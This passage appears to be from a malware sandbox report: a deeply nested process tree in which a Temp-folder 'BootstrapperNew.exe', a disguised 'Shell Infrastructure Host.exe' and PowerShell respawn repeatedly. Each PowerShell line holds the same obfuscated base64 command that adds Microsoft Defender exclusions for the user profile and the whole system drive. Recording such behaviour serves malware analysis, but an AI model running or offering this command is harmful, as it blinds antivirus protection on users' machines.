        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        256⤵
        
        PID:7676
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        256⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        256⤵
        
        PID:4272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        257⤵
        
        PID:2208
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        257⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        257⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        258⤵
        
        PID:7636
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        258⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        258⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        259⤵
        
        PID:3456
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        259⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        259⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        260⤵
        
        PID:3628
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        260⤵
        
        PID:8128
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        260⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        261⤵
        
        PID:5108
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        261⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        261⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        262⤵
        
        PID:216
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        262⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        262⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        263⤵
        
        PID:1580
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        263⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        263⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        264⤵
        
        PID:5860
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        264⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        264⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        265⤵
        
        PID:6136
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        265⤵
        
        PID:7292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        265⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        266⤵
        
        PID:6496
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        266⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        266⤵
        
        PID:6224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        267⤵
        
        PID:4828
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        267⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        267⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        268⤵
        
        PID:5920
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        268⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        268⤵
        
        PID:6524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        269⤵
        
        PID:4248
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        269⤵
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        269⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        270⤵
        
        PID:2952
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        270⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        270⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        271⤵
        
        PID:2384
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        271⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        271⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        272⤵
        
        PID:6984
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        272⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        272⤵
        
        PID:6648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        273⤵
        
        PID:3112
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        273⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        273⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        274⤵
        
        PID:7680
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        274⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        274⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        275⤵
        
        PID:8024
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        275⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        275⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        276⤵
        
        PID:7948
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        276⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        276⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        277⤵
        
        PID:1204
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        277⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        277⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        278⤵
        
        PID:4312
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        278⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        278⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        279⤵
        
        PID:2380
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        279⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        279⤵
        
        PID:7976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        280⤵
        
        PID:1428
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        280⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        280⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        281⤵
        
        PID:2456
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        281⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        281⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        282⤵
        
        PID:6284
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        282⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        282⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        283⤵
        
        PID:6040
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        283⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        283⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
